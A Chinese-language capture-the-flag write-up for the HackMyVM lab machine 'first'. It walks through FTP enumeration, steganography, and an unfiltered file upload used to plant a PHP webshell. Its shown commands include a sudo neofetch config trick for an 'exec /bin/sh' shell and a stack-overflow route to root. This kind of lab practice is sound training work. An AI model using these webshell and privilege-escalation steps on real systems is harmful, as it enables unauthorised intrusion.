hackmyvm first 复盘

基础信息

靶机ip 192.168.64.75
攻击机ip 192.168.64.3

信息搜集

扫描到3个端口，21端口，22端口和80端口

80端口看不到什么内容

nmap扫出来ftp端口有几个文件夹，登陆看看

ftp 192.168.64.75

登陆账号密码都是ftp就行，看来看去只有first文件夹下面有个图片。下载出来

接着就使用stegseek工具分析一下，自动分析出一个secret.txt

┌──(kali㉿kali)-[~]
└─$ stegseek first.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "firstgurl1"
[i] Original filename: "secret.txt".
[i] Extracting to "first.jpg.out".
the file "first.jpg.out" does already exist. overwrite ? (y/n)
y

┌──(kali㉿kali)-[~]
└─$ cat secret.txt
SGkgSSBoYWQgdG8gY2hhbmdlIHRoZSBuYW1lIG9mIHRoZSB0b2RvIGxpc3QgYmVjb3VzZSBkaXJlY3RvcnkgYnVzdGluZyBpcyB0b28gZWFzeSB0aGVlc2UgZGF5cyBhbHNvIEkgZW5jb2RlZCB0aGlzIGluIGJlc2E2NCBiZWNvdXNlIGl0IGlzIGNvb2wgYnR3IHlvdXIgdG9kbyBsaXN0IGlzIDogMmYgNzQgMzAgNjQgMzAgNWYgNmMgMzEgNzMgNzQgNWYgNjYgMzAgNzIgNWYgNjYgMzEgNzIgMzUgNzQgZG8gaXQgcXVpY2sgd2UgYXJlIHZ1bG5hcmFibGUgZG8gdGhlIGZpcnN0IGZpcnN0IA==

secret.txt里面是串base64字符，解密一下

┌──(kali㉿kali)-[~]
└─$ cat secret.txt| base64 -d
Hi I had to change the name of the todo list becouse directory busting is too easy theese days also I encoded this in besa64 becouse it is cool btw your todo list is : 2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74 do it quick we are vulnarable do the first first

注意看中间有一串十六机制数字，再解密一下，得到一个目录，访问一下

第一个shell

注意到第二点提到有upload.php，扫一下目录试试

扫到一个uploads目录和一个upload.php

可以发现文件上传没有任何过滤，那直接上传一个一句话木马

蚁剑连接

接下来我在目录上传一个后门php，kali开启监听，在蚁剑虚拟终端中用php，即可拿到www-data的shell

提权

sudo -l查到有neofetch可以利用，https://gtfobins.github.io/在这个网站查询到提权方式

www-data@first:/tmp$ echo 'exec /bin/sh' > a.sh
echo 'exec /bin/sh' > a.sh
www-data@first:/tmp$ ls
ls
a.sh
www-data@first:/tmp$ sudo -u first neofetch --config a.sh
sudo -u first neofetch --config a.sh
$ id
id
uid=1000(first) gid=1000(first) groups=1000(first),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

成功拿到first到shell

再次sudo -l，发现有个secret，file查看发现是个二进制文件

下载到本地用ida分析一下

学习别的wp指导这里有个栈溢出（这块地方有待学习），输入超过10个字符串就会执行我们的command，思路就是sudo调用，然后给一个/bin/bash就拿到root到权限了

总结

图片隐写分析，提权命令利用，栈溢出的利用。